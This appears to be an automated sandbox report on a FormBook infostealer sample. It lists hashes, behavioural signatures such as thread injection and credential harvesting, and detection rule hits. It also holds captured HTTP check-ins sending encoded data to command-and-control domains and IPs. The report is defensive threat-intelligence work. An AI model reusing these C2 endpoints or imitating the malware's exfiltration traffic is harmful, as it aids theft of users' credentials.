Edit tour

Windows Analysis Report
gH68ux6XtG.exe

Overview

General Information

Sample name:	gH68ux6XtG.exe renamed because original name is a hash value
Original sample name:	0963fec8c48547d89ad7e58d634bf3f7e2069e5b352ea52893e81b6ec6d73bc6.exe
Analysis ID:	1618200
MD5:	c9bea09545e7ef75e1f7531e5e9bf3e9
SHA1:	54e0b11ced9f3daca529c3bd56457a4293ded27c
SHA256:	0963fec8c48547d89ad7e58d634bf3f7e2069e5b352ea52893e81b6ec6d73bc6
Tags:	exetumbetgirislinki-fituser-JAMESWT_MHT
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

gH68ux6XtG.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\gH68ux6XtG.exe" MD5: C9BEA09545E7EF75E1F7531E5E9BF3E9)

5gtNFDn9VkJys5w.exe (PID: 1776 cmdline: "C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\1Crfo3sfoWau.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

runonce.exe (PID: 5292 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)

5gtNFDn9VkJys5w.exe (PID: 7028 cmdline: "C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\xt7i4RJZuH.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 4344 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.3502216825.0000000000B60000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3501035690.0000000002C90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3502706773.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2756355640.0000000001150000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2756183235.0000000000C61000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3502641258.0000000003070000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3502389846.0000000003370000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2756898776.00000000022F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.gH68ux6XtG.exe.c60000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:35:27.353450+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49999	162.218.30.235	80	TCP
2025-02-18T18:35:51.103448+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50010	103.106.67.112	80	TCP
2025-02-18T18:36:05.613841+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50014	104.21.96.1	80	TCP
2025-02-18T18:36:19.229047+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50018	104.21.112.1	80	TCP
2025-02-18T18:36:33.738826+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50023	134.122.133.80	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:35:43.194989+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50007	103.106.67.112	80	TCP
2025-02-18T18:35:45.777639+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50008	103.106.67.112	80	TCP
2025-02-18T18:35:48.355855+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50009	103.106.67.112	80	TCP
2025-02-18T18:35:57.216081+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50011	104.21.96.1	80	TCP
2025-02-18T18:36:00.292562+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50012	104.21.96.1	80	TCP
2025-02-18T18:36:02.327537+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50013	104.21.96.1	80	TCP
2025-02-18T18:36:11.519702+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50015	104.21.112.1	80	TCP
2025-02-18T18:36:14.143133+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50016	104.21.112.1	80	TCP
2025-02-18T18:36:16.605677+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50017	104.21.112.1	80	TCP
2025-02-18T18:36:25.589580+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50019	134.122.133.80	80	TCP
2025-02-18T18:36:29.148664+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50020	134.122.133.80	80	TCP
2025-02-18T18:36:31.215445+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50021	134.122.133.80	80	TCP

HTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 209Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 4b 44 61 68 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 31 4d 37 4b 64 32 39 67 73 41 36 2f 37 5a 63 48 7a 7a 59 47 53 30 39 63 4f 4a 54 6a 47 78 4a 32 4e 48 58 31 6b 7a 2b 2b 6a 48 5a 6a Data Ascii: KDah=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO1M7Kd29gsA6/7ZcHzzYGS09cOJTjGxJ2NHX1kz++jHZj

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:35:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxJ7trZ17TJqYb4NR5broko1fQD%2BI5ds4I1QqLxav0A%2FM%2F%2FfHI0Nk4ey1iefWGSgpapbsWbMbzjygSTarblBpOtNVGDnjNKemBeyrvdLtZXpboFw%2BCKa1KRaxhZGBdL9j9QjV7xS4NG4AGY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc6cb4aa475ae-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=67085&min_rtt=67085&rtt_var=33542&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=832&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Otq7r%2FhiqXpyugmfx8CgXCZouEbLEMwPjdso1CNXFItNKFdL1yjCbgzo4daRreY5hayculgbjCIWaL1XnsahflNYsXiUlbgUMulwqIUvAEHAZp32W8J%2BEy5bJ8t%2FtN%2BlAeWvjaeMSK%2FiCJU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc6eb681cb99c-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=66989&min_rtt=66989&rtt_var=33494&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1869&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 97 a3 4a 72 7e bf bf 42 ae 39 b6 67 0e 5d cd be d5 ad 6a 1b 10 12 48 02 01 12 92 d0 cb 3d 09 24 8b 58 c5 2e f9 cc 0f f2 df f0 2f f3 51 55 2f d5 55 52 77 df 19 3f 38 1f 4a 64 66 44 64 64 2c 5f 50 99 fc f6 db 6f 8f ff 32 5e 4a 6b c7 90 47 51 93 a5 9f 7e 7b 7c f9 19 8d 46 a3 c7 08 02 ff f3 63 06 1b 30 8a 9a a6 bc 87 c7 36 ee 9e ee a4 22 6f 60 de dc 37 a7 12 de 8d bc 97 de d3 5d 03 87 06 bd 88 f8 7d e4 45 a0 aa 61 f3 d4 36 c1 3d 77 77 53 0e f0 22 78 7f e1 af 8a f4 95 a0 bc b8 f7 2e 53 37 19 8d 0a 84 19 f8 33 1c f2 50 c6 15 ac 5f b1 60 df d1 e6 20 83 4f 77 5d 0c fb b2 a8 9a 57 64 7d ec 37 d1 93 0f bb d8 83 f7 cf 9d 0f a3 38 8f 9b 18 a4 f7 b5 07 52 f8 84 7f fc 2a aa 89 9b 14 7e a2 30 6a a4 17 cd 68 52 b4 b9 ff 88 be 0c be 10 d4 cd 29 85 a3 8b dd 3e 9b cb ab eb cf cc 97 e6 16 fe 69 f4 5f 5f bb 97 16 14 79 73 1f 80 2c 4e 4f 0f 23 a1 8a 41 fa 61 a4 c0 b4 83 4d ec 81 0f a3 1a e4 f5 7d 0d ab 38 f8 fd 3d 5b 1d 9f e1 c3 08 a7 ca e1 fb c9 34 ce e1 7d 04 e3 30 6a 1e 46 Data Ascii: 130aZYJr~B9g]jH=$X./QU/URw?8JdfDdd,_Po2^JkGQ~{\|Fc06"o`7]}Ea6=wwS"x.S73P_` Ow]Wd}78R*~0jhR)>i__ys,NO#AaM}8=[4}0jF
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhdvBupO1b6HFPUYgDPs%2FTd8F76S39rmCIGSdZm5MwmczqS1FDRqHwKImFdzFwbYwU4OJ02mlE0%2Bfsrb22V%2FsgxEC7qSeR1Hm%2FcY0%2BPsXWkl4ei2Y1mtndwcIrRs54IpmKabWiN1hnbop4A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc6fb6c65888b-LHRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=71658&min_rtt=71658&rtt_var=35829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=565&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 0d 0a 0a 0a 0a 0d 0a Data Ascii: 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1a%2BRT23XE7vpKvMX9fsxoP2zNbuGPiyRYGpy%2Bh%2BlqSBPBZJwb8jLl559TY70WHd9FN8fodiAn81QUdMTSllCpeEjI%2BUi22QRijUGlihmE%2BtTkUooqq7MJsVzX74eH7SbXyP%2B9e3uUEk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc7258e732c93-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37357&min_rtt=37357&rtt_var=18678&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ptm5RL8QUs0qoLQ6Ab0AI%2Ft70BIjB9CCTMt6c9gfTRX3ioKOrxc4waSrwLE9DLuEO%2Bq69D1%2BhUEEN5s3C24qiB4TaiJbZFripC6oQAq4%2BcIaDWGBfSqzLFVbcy0kWO%2Bk9Vu49qPNbq0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc735982ce863-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37131&min_rtt=37131&rtt_var=18565&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=847&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZT3Knyx0LPnX%2FxyNL4BMJJSl%2BFBsyr%2Fw%2BQ6ynxA0KsqzD22lXQsxSdhmDg0KGR194h8XQoiWEK%2BIQ9ofIbE0Z2Ld05r%2BvqO5Qc7D9F0Yt2YPs2J%2F%2FE0CA5vWRRdGtA%2FisqmXL2CrIUk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc7453820a2e6-YULContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=17422&min_rtt=17422&rtt_var=8711&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1860&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kS888Q%2FqlilF5t5Thzj2ycSAkOQIixZsfMbr1BO5FA5Z5fwNLR9STPWajXkAiW%2B%2F55pNyOIxz8%2FVvsCNXIhXyEjWy02mFIqhDKi4IZQ4AEXDo%2B9xrbvULOgchWgVBROpByuqW2w8PiY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc75559842ca9-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37194&min_rtt=37194&rtt_var=18597&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=562&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:25 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:27 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:27 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:27 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:31 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:33 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: runonce.exe, 0000000A.00000002.3504276702.0000000005988000.00000004.10000000.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3503374659.0000000003188000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3502216825.0000000000BBB000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kjuw.party
Source: 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3502216825.0000000000BBB000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kjuw.party/e0jv/
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
